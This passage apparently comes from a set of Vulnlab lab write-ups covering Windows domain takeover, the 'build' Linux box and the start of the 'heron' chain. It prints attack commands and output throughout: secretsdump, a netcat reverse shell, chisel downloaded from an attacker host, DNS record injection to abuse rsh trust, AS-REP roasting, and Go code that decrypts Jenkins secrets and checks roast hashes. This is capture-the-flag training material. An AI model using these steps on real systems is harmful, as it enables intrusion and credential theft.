    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data

    LastWritten      : 3/10/2024 2:49:34 PM
    TargetName       : Domain:batch=TaskScheduler:Task:{3C0BC8C6-D88D-450C-803D-6A412D858CF2}
    TargetAlias      : 
    Comment          : 
    UserName         : TENGU\T0_c.fowler
    Credential       : Unt<redacted>y25

 

.

 

PS C:\temp> net user puck Password123! /add
The command completed successfully.

PS C:\temp> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest                    
puck                     WDAGUtilityAccount       
The command completed with one or more errors.

PS C:\temp> net localgroup administrators puck /add
The command completed successfully.

Next, RDP to SQL as puck through the proxy:

proxychains xfreerdp /u:puck /p:'Password123!' /w:1566 /h:968 /v:10.10.141.134:3389

 

From there, start Active Directory Users and Computers as T0_c.fowler (the domain admin whose password we just recovered), add puck as a domain admin, then mstsc to dc.tengu.vl.

 

Finally, dump the domain hashes from the DC:

proxychains4 impacket-secretsdump 'tengu/puck:Password123!@dc.tengu.vl' > allhashes.txt

Because all Domain Admins are members of PROTECTED USERS@TENGU.VL we can't RDP in with them: Protected Users membership disables NTLM and CredSSP credential delegation, which RDP with NLA needs, so the DC is dumped remotely with secretsdump instead.

 

 

That was super fun

vulnlab-build

an easy Linux box

.

rsync enum

└─$ rsync -av --list-only rsync://10.10.94.243
backups         backups
└─$ rsync -r rsync://10.10.94.243::backups

Decrypting the Jenkins password: the rsync backup contains the Jenkins home, and secrets/master.key plus secrets/hudson.util.Secret are all that is needed to recover any secret stored in a job config.

┌──(puck㉿kali)-[~/vulnlab/build/jenkins_configuration/secrets]
└─$ python3 ../../decrypt.py master.key hudson.util.Secret ../jobs/build/config.xml
Git<redacted>!
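
What decrypt.py is doing, as an added Go example (not the page's script and not Jenkins code): Jenkins hashes the raw bytes of secrets/master.key with SHA-256 and keeps the first 16 bytes as an AES-128 key; with that it decrypts secrets/hudson.util.Secret (AES-ECB), checks for the trailing ::::MAGIC:::: marker and uses the first 16 bytes of the result as the key for every Secret in config.xml or credentials.xml. Values that start with {AQAAAB...} are the current format (0x01, IV length, data length, IV, AES-128-CBC data); older ones are AES-ECB of the plaintext plus the magic. The master.key bytes, key, IV and password in the block are constructed, and MakeFixture exists only to build a test input the way Jenkins would.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
	"strings"
)

const jenkinsMagic = "::::MAGIC::::"

// masterCipher mirrors hudson.Util.toAes128Key: SHA-256 over the raw bytes of master.key, first 16 bytes kept.
func masterCipher(masterKey []byte) cipher.Block {
	h := sha256.Sum256(masterKey)
	block, _ := aes.NewCipher(h[:16]) // 16-byte key: cannot fail
	return block
}

func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%aes.BlockSize != 0 || b[len(b)-1] == 0 || int(b[len(b)-1]) > aes.BlockSize {
		return nil, errors.New("bad length or PKCS#7 padding (wrong key?)")
	}
	return b[:len(b)-int(b[len(b)-1])], nil
}

func pkcs7Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

// ecb runs AES-ECB block by block; Go's stdlib deliberately offers no ECB mode.
func ecb(block cipher.Block, in []byte, encrypt bool) []byte {
	out, op := make([]byte, len(in)), block.Decrypt
	if encrypt {
		op = block.Encrypt
	}
	for i := 0; i+aes.BlockSize <= len(in); i += aes.BlockSize {
		op(out[i:i+aes.BlockSize], in[i:i+aes.BlockSize])
	}
	return out
}

// ConfidentialKey recovers the AES key behind every hudson.util.Secret value from master.key and secrets/hudson.util.Secret.
func ConfidentialKey(masterKey, hudsonSecret []byte) ([]byte, error) {
	payload, err := pkcs7Unpad(ecb(masterCipher(masterKey), hudsonSecret, false))
	if err != nil || len(payload) < 16+len(jenkinsMagic) || !bytes.HasSuffix(payload, []byte(jenkinsMagic)) {
		return nil, errors.New("padding or ::::MAGIC:::: check failed: wrong master.key?")
	}
	return payload[:16], nil // Jenkins stores 256 random bytes but keys AES with the first 16
}

// DecryptSecret decodes one encrypted value as it appears in config.xml or credentials.xml.
func DecryptSecret(key []byte, encoded string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(strings.Trim(strings.TrimSpace(encoded), "{}"))
	block, kerr := aes.NewCipher(key)
	if err != nil || kerr != nil {
		return "", errors.New("value is not base64 or key is not 16 bytes")
	}
	if len(raw) > 9 && raw[0] == 1 { // PAYLOAD_V1: 0x01 | ivLen | dataLen | iv | AES-128-CBC data
		ivLen, dataLen := int(binary.BigEndian.Uint32(raw[1:5])), int(binary.BigEndian.Uint32(raw[5:9]))
		if ivLen != aes.BlockSize || dataLen%aes.BlockSize != 0 || len(raw) < 9+ivLen+dataLen {
			return "", errors.New("corrupt V1 payload")
		}
		pt := make([]byte, dataLen)
		cipher.NewCBCDecrypter(block, raw[9:9+ivLen]).CryptBlocks(pt, raw[9+ivLen:9+ivLen+dataLen])
		pt, err = pkcs7Unpad(pt)
		return string(pt), err
	}
	pt, err := pkcs7Unpad(ecb(block, raw, false)) // older values: AES-128-ECB over plaintext + MAGIC, no IV
	if err != nil || !bytes.HasSuffix(pt, []byte(jenkinsMagic)) {
		return "", errors.New("legacy value: padding or magic check failed (wrong key?)")
	}
	return string(bytes.TrimSuffix(pt, []byte(jenkinsMagic))), nil
}

// MakeFixture builds a constructed master.key / hudson.util.Secret / V1 value the way Jenkins would, for offline testing.
func MakeFixture(masterKey, confKey, iv []byte, secret string) (hudsonSecret []byte, encoded string) {
	payload := append(append(append([]byte{}, confKey...), bytes.Repeat([]byte{0x42}, 240)...), jenkinsMagic...)
	hudsonSecret = ecb(masterCipher(masterKey), pkcs7Pad(payload), true)
	ck, _ := aes.NewCipher(confKey)
	ct := pkcs7Pad([]byte(secret))
	cipher.NewCBCEncrypter(ck, iv).CryptBlocks(ct, ct) // encrypt in place
	hdr := binary.BigEndian.AppendUint32(binary.BigEndian.AppendUint32([]byte{1}, uint32(len(iv))), uint32(len(ct)))
	return hudsonSecret, "{" + base64.StdEncoding.EncodeToString(append(append(hdr, iv...), ct...)) + "}"
}

func main() {
	mk, ck, iv := []byte("constructed-master-key"), []byte("0123456789abcdef"), []byte("fedcba9876543210") // all constructed
	hs, enc := MakeFixture(mk, ck, iv, "s3cretJenkinsPassw0rd")
	key, err := ConfidentialKey(mk, hs)
	plain, derr := DecryptSecret(key, enc)
	fmt.Printf("%s\n-> %q (%v %v)\n", enc, plain, err, derr)
}
```

Point ConfidentialKey at the two files from the rsync backup and DecryptSecret at any password or privateKey value from the job or credentials XML; a wrong master.key shows up as the magic check failing rather than as garbage output.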

Log in to Gitea as user buildadm with that password and get RCE by editing the Jenkinsfile: the next build runs whatever it contains.

Start a netcat listener to catch the shell

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ nc -nlvp 9001              
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.94.243] 38892
sh: 0: can't access tty; job control turned off
# pwd
/var/jenkins_home/workspace/build_dev_main
# cd /root
# ls
user.txt
# cat user.txt
VL{bf<redacted>c2}

Run the chisel server on Kali (reverse SOCKS, listening on 127.0.0.1:1080):

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ chisel server -p 8000 --reverse     
2024/08/09 10:26:20 server: Reverse tunnelling enabled
2024/08/09 10:26:20 server: Fingerprint pcPwgUx5V0JZX07cMUWbhSsjiQijd+PWFISAgaIp+vE=
2024/08/09 10:26:20 server: Listening on http://0.0.0.0:8000
2024/08/09 10:28:31 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

From inside the container where the shell landed:

# pwd
/root/.ssh
# wget http://10.8.2.138/chisel
sh: 24: wget: not found
# curl http://10.8.2.138/chisel -o chisel
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 8506k  100 8506k    0     0  8620k      0 --:--:-- --:--:-- --:--:-- 8618k
# chmod +x chisel
# ls -la
total 8528
drwxr-xr-x 3 root root    4096 Aug  9 08:25 .
drwxr-xr-x 1 root root    4096 May  9 18:50 ..
lrwxrwxrwx 1 root root       9 May  1 14:37 .bash_history -> /dev/null
-r-------- 1 root root      35 May  1 17:37 .rhosts
drwxr-xr-x 2 root root    4096 May  1 16:05 .ssh
-rwxr-xr-x 1 root root 8711104 Aug  9 08:25 chisel
-rw------- 1 root root      37 May  1 14:29 user.txt
# ./chisel client 10.8.2.138:8000 R:socks
2024/08/09 08:28:30 client: Connecting to ws://10.8.2.138:8000
2024/08/09 08:28:30 client: Connected (Latency 20.395643ms)

.

Nmap the Docker host (172.18.0.1, the bridge gateway) through the SOCKS proxy:

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ proxychains -q nmap 172.18.0.1
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-09 10:29 CEST
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 24.50% done; ETC: 10:30 (0:00:46 remaining)
Stats: 0:00:36 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 62.10% done; ETC: 10:30 (0:00:23 remaining)
Nmap scan report for 172.18.0.1
Host is up (0.059s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
873/tcp  open  rsync
3000/tcp open  ppp
3306/tcp open  mysql
8081/tcp open  blackice-icecap

Nmap done: 1 IP address (1 host up) scanned in 59.51 seconds
                                                                                                                              

Now the MariaDB part: the host lets root in without a password, and the powerdnsadmin database holds both the PowerDNS-Admin admin hash (cracked below) and the records of the build.vl zone that this host serves on port 53. Inserting an A record that points admin.build.vl at our IP is what makes the rsh login as root further down work: the r-services trust clients by the name their address resolves to.

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ proxychains mysql -h 172.18.0.1 -u root
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.18.0.1:3306  ...  OK
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 34
Server version: 11.3.2-MariaDB-1:11.3.2+maria~ubu2204 mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| powerdnsadmin      |
| sys                |
+--------------------+
5 rows in set (0.025 sec)

MariaDB [(none)]> use powerdnsadmin;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [powerdnsadmin]> select * from user;
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| id | username | password                                                     | firstname | lastname | email          | otp_secret | role_id | confirmed |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
|  1 | admin    | $2b$12$s1hK<redacted>Ze3Uw5Sc2.hsEq | admin     | admin    | admin@build.vl | NULL       |       1 |         0 |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
1 row in set (0.023 sec)

MariaDB [powerdnsadmin]> select * from records;
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| id | domain_id | name                 | type | content                                                                                  | ttl  | prio | disabled | ordername | auth |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
|  8 |         1 | db.build.vl          | A    | 172.18.0.4                                                                               |   60 |    0 |        0 | NULL      |    1 |
|  9 |         1 | gitea.build.vl       | A    | 172.18.0.2                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 10 |         1 | intern.build.vl      | A    | 172.18.0.1                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 11 |         1 | jenkins.build.vl     | A    | 172.18.0.3                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 12 |         1 | pdns-worker.build.vl | A    | 172.18.0.5                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 13 |         1 | pdns.build.vl        | A    | 172.18.0.6                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 14 |         1 | build.vl             | SOA  | a.misconfigured.dns.server.invalid hostmaster.build.vl 2024050201 10800 3600 604800 3600 | 1500 |    0 |        0 | NULL      |    1 |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
7 rows in set (0.022 sec)

MariaDB [powerdnsadmin]> 
MariaDB [powerdnsadmin]> INSERT INTO records (id, domain_id, name, type, content, ttl, prio, disabled, ordername, auth)
    -> VALUES (7, 1, 'admin.build.vl', 'A', '10.8.2.138', 60, 0, 0, NULL,1);
Query OK, 1 row affected (0.023 sec)

MariaDB [powerdnsadmin]> 

.

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ john admin.hash                                            
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Proceeding with wordlist:/usr/share/john/password.lst
wi<redacted>on          (?)     
1g 0:00:00:17 DONE 2/3 (2024-08-09 10:36) 0.05688g/s 40.95p/s 40.95c/s 40.95C/s roman..xavier
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Install the rsh client on the Kali box:

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ sudo apt-get install rsh-redone-client

rsh to the build.vl machine as root; no password is asked, because the host trusts admin.build.vl and that name now resolves to us:

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ rsh -l root 10.10.94.243
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-105-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Fri Aug  9 08:42:41 AM UTC 2024

  System load:                      0.64306640625
  Usage of /:                       62.7% of 9.75GB
  Memory usage:                     60%
  Swap usage:                       0%
  Processes:                        144
  Users logged in:                  0
  IPv4 address for br-f8002c9d7234: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for ens5:            10.10.94.243


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

root@build:~# pwd
/root
root@build:~# cat root.txt
VL{fe<redacted>b2}
root@build:~# 
                                                                                       

That was fun.

 

 

 

vulnlab-heron

a medium chain

We find a note online with the initial password for the Linux box: pentest:Heron123!

We start the chisel server on our Kali box:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ chisel server -p 8000 --reverse 
2024/08/02 14:29:11 server: Reverse tunnelling enabled
2024/08/02 14:29:11 server: Fingerprint eyu7C2ldEm70kbrgTg7RsaykP56cSgqwu7GXCH17JyM=
2024/08/02 14:29:11 server: Listening on http://0.0.0.0:8000
2024/08/02 14:30:12 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

 

.

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ ssh pentest@10.10.148.86                                      
The authenticity of host '10.10.148.86 (10.10.148.86)' can't be established.
ED25519 key fingerprint is SHA256:7vUA9tMchnLRfzMzAtJD+Hwwr0nppIBRhctvevOQbm0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.148.86' (ED25519) to the list of known hosts.
****************************************************
*              Welcome to Heron Corp               *
*  Unauthorized access to 'frajmp.heron.vl' is     *
*  forbidden and will be prosecuted by law.        *
****************************************************
(pentest@10.10.148.86) Password: 
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-107-generic x86_64)

 System information as of Fri Aug  2 12:24:16 PM UTC 2024

  System load:  0.0               Processes:             110
  Usage of /:   44.8% of 9.75GB   Users logged in:       0
  Memory usage: 23%               IPv4 address for ens5: 10.10.148.86
  Swap usage:   0%


Last login: Fri Jun  7 10:34:38 2024 from 10.8.0.101
pentest@frajmp:~$ who
pentest  pts/0        2024-08-02 12:24 (10.8.2.138)
pentest@frajmp:~$ cd /tmp
pentest@frajmp:/tmp$ wget http://10.8.2.138/chisel
--2024-08-02 12:28:23--  http://10.8.2.138/chisel
Connecting to 10.8.2.138:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8711104 (8.3M) [application/octet-stream]
Saving to: ‘chisel’

chisel                100%[=======================>]   8.31M  6.88MB/s    in 1.2s    

2024-08-02 12:28:25 (6.88 MB/s) - ‘chisel’ saved [8711104/8711104]

pentest@frajmp:/tmp$ chmod +x chisel 
pentest@frajmp:/tmp$ ./chisel client 10.8.2.138:8000 R:socks
2024/08/02 12:30:11 client: Connecting to ws://10.8.2.138:8000
2024/08/02 12:30:12 client: Connected (Latency 20.482852ms)

We run a slow nmap scan of the DC through proxychains. Over a SOCKS proxy only a TCP connect scan works (-sT, the default when not running as root) and every port probe is its own tunnelled connection, so we limit the scan to a handful of ports:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains nmap -sC -sV -oN herondc.nmap -p 80,445,389,53,135,3389,443,21 10.10.148.85      
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 14:47 CEST
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:53  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:3389  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:443 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:21 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:389  ...  OK

Nmap scan report for 10.10.148.85
Host is up (0.062s latency).

PORT     STATE  SERVICE       VERSION
21/tcp   closed ftp
53/tcp   open   domain        Simple DNS Plus
80/tcp   open   http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Heron Corp
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open   msrpc         Microsoft Windows RPC
389/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: heron.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=mucdc.heron.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:mucdc.heron.vl
| Not valid before: 2024-06-01T15:29:52
|_Not valid after:  2025-06-01T15:29:52
|_ssl-date: TLS randomness does not represent time
443/tcp  closed https
445/tcp  open   microsoft-ds  Windows Server 2022 Standard 20348 microsoft-ds (workgroup: HERON)
3389/tcp open   ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-08-02T12:49:19+00:00; -2s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: HERON
|   NetBIOS_Domain_Name: HERON
|   NetBIOS_Computer_Name: MUCDC
|   DNS_Domain_Name: heron.vl
|   DNS_Computer_Name: mucdc.heron.vl
|   DNS_Tree_Name: heron.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-08-02T12:49:08+00:00
| ssl-cert: Subject: commonName=mucdc.heron.vl
| Not valid before: 2024-06-01T10:54:12
|_Not valid after:  2024-12-01T10:54:12
Service Info: Host: MUCDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-08-02T12:49:12
|_  start_date: N/A
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
|_clock-skew: mean: 1h23m58s, deviation: 3h07m51s, median: -2s
| smb-os-discovery: 
|   OS: Windows Server 2022 Standard 20348 (Windows Server 2022 Standard 6.3)
|   Computer name: mucdc
|   NetBIOS computer name: MUCDC\x00
|   Domain name: heron.vl
|   Forest name: heron.vl
|   FQDN: mucdc.heron.vl
|_  System time: 2024-08-02T05:49:10-07:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.02 seconds
                                                                                      

.

Port 80 serves a company page; curl it and collect the names and e-mail addresses, which give us both a first set of users and the first.last username format:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 curl http://10.10.148.85          
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:80  ...  OK
<!DOCTYPE html>
<html lang="en">
<body>
    <div class="container mt-5">
        <div class="text-center mb-4">
            <h1 class="display-4 text-white">Heron Corp</h1>
            <p class="lead text-white">Building the future of aerospace with precision and innovation.</p>


                        <h5 class="card-title">Wayne Wood</h5>
                        <p class="card-text">CEO</p>
                        <p>Email: wayne.wood@heron.vl</p>

                        <h5 class="card-title">Julian Pratt</h5>
                        <p class="card-text">Head of IT</p>
                        <p>Email: julian.pratt@heron.vl</p>

                        <i class="fas fa-user-tie fa-3x mb-3"></i>
                        <h5 class="card-title">Samuel Davies</h5>
                        <p class="card-text">Accounting</p>
                        <p>Email: samuel.davies@heron.vl</p>

</body>
</html>                                                                                      

We add the DC to /etc/hosts:

10.10.148.85 mucdc.heron.vl heron.vl

Check for AS-REP roastable users, i.e. AD accounts with 'Do not require Kerberos preauthentication' set. GetNPUsers sends an AS-REQ without pre-authentication for every name in users.txt; for an account with pre-auth disabled the KDC answers with an AS-REP whose enc-part is encrypted under the user's password-derived key, which can be cracked offline. The errors are useful too: KDC_ERR_C_PRINCIPAL_UNKNOWN means the username does not exist, KDC_ERR_CLIENT_REVOKED that the account is disabled or locked out.

 

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 impacket-GetNPUsers heron.vl/'Guest' -dc-ip 10.10.148.85 -no-pass -request -usersfile users.txt      
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] User svc-web-accounting-d doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] User svc-web-accounting doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] User wayne.wood doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] User julian.pratt doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
$krb5asrep$23$samuel.davies@HERON.VL:5253809049f054f80bde543e1a85bd56$d72a41d4e4a470a8abb50153b4cf1b365c82e8d0be2c8b376559f2ceaeda11962b2ca2eb37e0fa3feae5cad46f8da6c4abc5d15c32a2b66651c5846f21755d587d8996a83f9e34bddd777f420f6da1061da0c33fd594c0432c9cf69ad6fb7c881858578ca9870cefffaf7c0a34f9deca4209cdf8a0e0a9b971a32e01744bc98c1f69d1dfd32d19e95124c7f9603adc9b139971aad3354ea4e2a1d1e23df6bb70fa57d9e967c98972058a1510e3b8f5ff0c55e45f35478fa0437e1119d2ad36e4d54d2695a6f545ea0a8f46b3b053a154f61d66fa8755d7d8676d71ec6f45aa40163b2101
[-] invalid principal syntax
                                                                                      

We crack this with hashcat; an AS-REP roast hash with etype 23 (RC4-HMAC, the $krb5asrep$23$ prefix) is hashcat mode 18200:
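
What that line contains, and what hashcat does with it for every candidate, as an added Go example (not impacket's or hashcat's code): mode 18200 takes $krb5asrep$23$user@REALM:checksum$edata, where checksum is the 16-byte HMAC-MD5 and edata the RC4 ciphertext of the AS-REP enc-part (RFC 4757 RC4-HMAC). Per candidate the cracker derives K1 = HMAC-MD5(NT hash, key usage 8, the value Windows KDCs use for the AS-REP enc-part), K3 = HMAC-MD5(K1, checksum), RC4-decrypts edata with K3 and compares HMAC-MD5(K1, plaintext) with the checksum; the KDC is never contacted again. Go's standard library has no MD4, so CheckCandidate takes the NT hash rather than the password; the NT hash, confounder and EncASRepPart bytes fed to MakeASREP are constructed.

```go
package main

import (
	"crypto/hmac"
	"crypto/md5"
	"crypto/rc4"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// ASREPHash is a parsed hashcat-18200 line: $krb5asrep$23$user@REALM:checksum$edata
type ASREPHash struct {
	User, Realm string
	Checksum    []byte // 16-byte HMAC-MD5 over confounder || EncASRepPart plaintext
	EncData     []byte // RC4 ciphertext of confounder || EncASRepPart
}

// ParseASREP validates the layout GetNPUsers prints and hashcat mode 18200 expects.
func ParseASREP(line string) (*ASREPHash, error) {
	p := strings.Split(strings.TrimSpace(line), "$")
	if len(p) != 5 || p[0] != "" || p[1] != "krb5asrep" || p[2] != "23" {
		return nil, errors.New("expected $krb5asrep$23$...; etype 17/18 lines are hashcat modes 32100/32200")
	}
	princ := strings.SplitN(p[3], ":", 2)
	if len(princ) != 2 {
		return nil, errors.New("missing ':' between principal and checksum")
	}
	ur := strings.SplitN(princ[0], "@", 2)
	if len(ur) != 2 {
		return nil, errors.New("principal must be user@REALM")
	}
	sum, err := hex.DecodeString(princ[1])
	if err != nil || len(sum) != md5.Size {
		return nil, errors.New("checksum must be 16 hex-encoded bytes")
	}
	enc, err := hex.DecodeString(p[4])
	if err != nil || len(enc) < 8 {
		return nil, errors.New("enc-part must be hex and at least the 8-byte confounder")
	}
	return &ASREPHash{User: ur[0], Realm: ur[1], Checksum: sum, EncData: enc}, nil
}

func hmacMD5(key, data []byte) []byte {
	m := hmac.New(md5.New, key)
	m.Write(data)
	return m.Sum(nil)
}

// usageKey is K1 of RFC 4757 (RC4-HMAC): HMAC-MD5(NT hash, key usage as 4-byte
// little-endian). Windows KDCs use usage 8 for the AS-REP enc-part, as does hashcat 18200.
func usageKey(ntHash []byte) []byte { return hmacMD5(ntHash, []byte{8, 0, 0, 0}) }

// CheckCandidate is one step of the offline cracking loop: does this NT hash
// (MD4 of the UTF-16LE password) decrypt the enc-part so that the HMAC verifies?
func CheckCandidate(h *ASREPHash, ntHash []byte) bool {
	k1 := usageKey(ntHash)
	c, err := rc4.NewCipher(hmacMD5(k1, h.Checksum)) // K3 = HMAC-MD5(K1, checksum)
	if err != nil {
		return false
	}
	pt := make([]byte, len(h.EncData))
	c.XORKeyStream(pt, h.EncData)
	return hmac.Equal(hmacMD5(k1, pt), h.Checksum)
}

// MakeASREP is the encrypt side of RC4-HMAC, used only to build a constructed roast
// line for a known NT hash so the check above can be exercised offline.
func MakeASREP(user, realm string, ntHash, confounderAndPlain []byte) string {
	k1 := usageKey(ntHash)
	sum := hmacMD5(k1, confounderAndPlain)
	c, _ := rc4.NewCipher(hmacMD5(k1, sum))
	ct := make([]byte, len(confounderAndPlain))
	c.XORKeyStream(ct, confounderAndPlain)
	return fmt.Sprintf("$krb5asrep$23$%s@%s:%x$%x", user, realm, sum, ct)
}

func main() {
	nt := []byte("constructed-nt16")                             // constructed stand-in for an NT hash
	plain := append([]byte("cnfoundr"), 0x79, 0x81, 0xd0, 0x30) // confounder + start of an EncASRepPart
	line := MakeASREP("svc_demo", "EXAMPLE.VL", nt, plain)
	h, _ := ParseASREP(line)
	fmt.Println(line)
	fmt.Println("right NT hash:", CheckCandidate(h, nt), "wrong NT hash:", CheckCandidate(h, []byte("constructed-nt17")))
}
```

The whole check is two HMAC-MD5s and one RC4 pass per candidate, which is why RC4 roasts crack so fast compared with the AES etypes (PBKDF2 with 4096 iterations per guess); it also shows why the roast hash alone is enough to take offline and why the lockout counter never moves.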

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ hashcat -m 18200 -o cracked4.txt hash /usr/share/wordlists/rockyou.txt 
